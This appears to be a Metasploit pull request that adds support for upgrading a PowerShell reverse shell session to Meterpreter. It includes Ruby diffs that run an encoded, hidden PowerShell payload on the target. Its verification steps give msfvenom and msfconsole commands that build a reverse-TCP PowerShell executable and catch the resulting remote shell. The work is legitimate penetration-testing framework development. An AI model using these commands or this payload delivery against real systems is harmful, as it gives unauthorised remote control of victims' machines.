### PR TITLE
support upgrading a powershell session to meterpreter

### DIFF
--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -28,6 +28,13 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
   end
 
   #
+  # Returns the session platform.
+  #
+  def platform
+    "win"
+  end
+
+  #
   # Returns the session description.
   #
   def desc

--- a/lib/msf/base/sessions/powershell.rb
+++ b/lib/msf/base/sessions/powershell.rb
@@ -44,7 +44,7 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
   #
   # Takes over the shell_command of the parent
   #
-  def shell_command(cmd)
+  def shell_command(cmd, timeout = 1800)
     # insert random marker
     strm = Rex::Text.rand_text_alpha(15)
     endm = Rex::Text.rand_text_alpha(15)
@@ -52,7 +52,6 @@ class Msf::Sessions::PowerShell < Msf::Sessions::CommandShell
     # Send the shell channel's stdin.
     shell_write(";'#{strm}'\n" + cmd + "\n'#{endm}';\n")
 
-    timeout = 1800 # 30 minute timeout
     etime = ::Time.now.to_f + timeout
 
     buff = ""

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,6 @@ module Exploit::Powershell
   # @param ps_code [String] Powershell code
   # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
   # @param encoded [Boolean] Indicates whether ps_code is encoded or not
-  #ex
   # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {

--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -147,7 +147,7 @@ module Exploit::Powershell
   # @param ps_code [String] Powershell code
   # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
   # @param encoded [Boolean] Indicates whether ps_code is encoded or not
-  #
+  #ex
   # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {

--- a/lib/msf/core/post/common.rb
+++ b/lib/msf/core/post/common.rb
@@ -198,6 +198,13 @@ module Msf::Post::Common
       end
 
       process.close
+    when /powershell/
+      if args.nil? || args.empty?
+        o = session.shell_command("#{cmd}", time_out)
+      else
+        o = session.shell_command("#{cmd} #{args}", time_out)
+      end
+      o.chomp! if o
     when /shell/
       if args.nil? || args.empty?
         o = session.shell_command_token("#{cmd}", time_out)

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1917,7 +1917,7 @@ class Core
             session.response_timeout = response_timeout
           end
           begin
-            if session.type.include? 'shell'
+            if ['shell', 'powershell'].include?(session.type)
               session.init_ui(driver.input, driver.output)
               session.execute_script('post/multi/manage/shell_to_meterpreter')
               session.reset_ui

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -1917,12 +1917,12 @@ class Core
             session.response_timeout = response_timeout
           end
           begin
-            if session.type == 'shell'
+            if session.type.include? 'shell'
               session.init_ui(driver.input, driver.output)
               session.execute_script('post/multi/manage/shell_to_meterpreter')
               session.reset_ui
             else
-              print_error("Session #{sess_id} is not a command shell session, skipping...")
+              print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...")
               next
             end
           ensure

--- a/modules/post/multi/manage/shell_to_meterpreter.rb
+++ b/modules/post/multi/manage/shell_to_meterpreter.rb
@@ -128,15 +128,37 @@ class Metasploit3 < Msf::Post
 
     case platform
     when 'win'
-      if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
-        vprint_status("Transfer method: Powershell")
-        psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
-        cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
-      else
-        print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
-        vprint_status("Transfer method: VBS [fallback]")
-        exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
-        aborted = transmit_payload(exe)
+      if session.type == 'powershell'
+        template_path = File.join(Msf::Config.data_directory, 'templates', 'scripts')
+        psh_payload = case datastore['Powershell::method']
+                      when 'net'
+                        Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload_data)
+                      when 'reflection'
+                        Rex::Powershell::Payload.to_win32pe_psh_reflection(template_path, payload_data)
+                      when 'old'
+                        Rex::Powershell::Payload.to_win32pe_psh(template_path, payload_data)
+                      when 'msil'
+                        fail RuntimeError, 'MSIL Powershell method no longer exists'
+                      else
+                        fail RuntimeError, 'No Powershell method specified'
+                      end
+
+        # prepend_sleep => 1
+        psh_payload = 'Start-Sleep -s 1;' << psh_payload
+
+        encoded_psh_payload = encode_script(psh_payload)
+        cmd_exec(run_hidden_psh(encoded_psh_payload, psh_arch, true))
+      else # shell
+        if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
+          vprint_status("Transfer method: Powershell")
+          psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
+          cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))
+        else
+          print_error('Powershell is not installed on the target.') if datastore['WIN_TRANSFER'] == 'POWERSHELL'
+          vprint_status("Transfer method: VBS [fallback]")
+          exe = Msf::Util::EXE.to_executable(framework, larch, lplat, payload_data)
+          aborted = transmit_payload(exe)
+        end
       end
     when 'python'
       vprint_status("Transfer method: Python")


### PR DESCRIPTION
This fixes #5947, partially fixes issue reported on twitter https://twitter.com/info_dox/status/641197304872050688
# Verification Steps
- [x] Create a powershell session, e.g.:

```
./msfvenom -p windows/powershell_reverse_tcp -f exe -o psh.exe LHOST=192.168.56.1
./msfconsole -qx 'use exploit/multi/handler; set payload windows/powershell_reverse_tcp; set lhost 192.168.56.1; run'
```
- [x] Background the session with ctrl-z and upgrade with 'sessions -u 1'
- [x] You should see something like this:

```
msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.56.1:4433
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4433 -> 192.168.56.102:49373) at 2015-09-08 15:35:22 +0200
```
